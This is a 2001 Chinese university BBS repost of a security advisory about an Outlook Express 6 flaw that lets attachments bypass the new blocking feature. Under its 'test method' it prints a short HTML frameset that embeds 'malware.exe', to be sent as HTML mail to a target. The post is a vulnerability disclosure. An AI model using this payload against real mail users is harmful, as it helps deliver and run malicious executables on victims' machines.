荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: netlife (漂游), 信区: Microsoft
标  题: [转载] Outlook Express 6 附件安全迂回漏洞(2001-9-5)
发信站: 荔园晨风BBS站 (Wed Sep  5 20:00:38 2001), 转信

【 以下文字转载自 Newsoftware 讨论区 】
【 原文由 netlife 所发表 】
发信人: laofuzihere (老夫子◎偶土故偶在), 信区: Software
标  题: Outlook Express 6 附件安全迂回漏洞(2001-9-5)
发信站: 北大未名站 (2001年09月05日17:56:49 星期三), 站内信件

Outlook Express 6 附件安全迂回漏洞(2001-9-5)


    名称: Outlook Express 6 Attachment Security Bypass Vulnerability

    类型: 未知

    发布日期: 2001-9-5

    影响系统: Microsoft Outlook Express 6.0
                    - Microsoft Windows ME
                    - Microsoft Windows 98se
                    - Microsoft Windows 98
                    - Microsoft Windows 95
                    - Microsoft Windows NT 4.0

    描述: 微软OutLook Express 6中带了一个新的安全特性,可以阻止用户打开
或者
保存可能有害的附件。
           然而,这个特性存在一个漏洞。攻击者可以通过在邮件中嵌入一个
frame来
绕过上述保护。当攻击者在frame中嵌入一个".exe"或者“.bat"文件时,如果用户
试图
打开这个文件,恶意程序可能被执行。用户也可以将其保存在硬盘上。

    测试方法: 将下面的攻击代码以 html 邮件形式发给目标用户
<frameset rows="100%,*">
<frame src="malware.exe">
</frameset>
可能使用户执行malware.exe

    解决方法: 暂无


--
欢迎光临★Software★版!

※ 来源:·北大未名站 bbs.pku.edu.cn·[FROM: 162.105.90.55]

--
                       Wellcome to http://192.168.48.13
                        Wellcome to ftp://192.168.48.13
                           提供光盘刻录服务
                -----------------------------------------------
                     数据光盘  音乐光盘  视频光盘  光盘复制
                  ☆欢迎光临http://192.168.48.13☆

※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.48.13]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.48.13]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店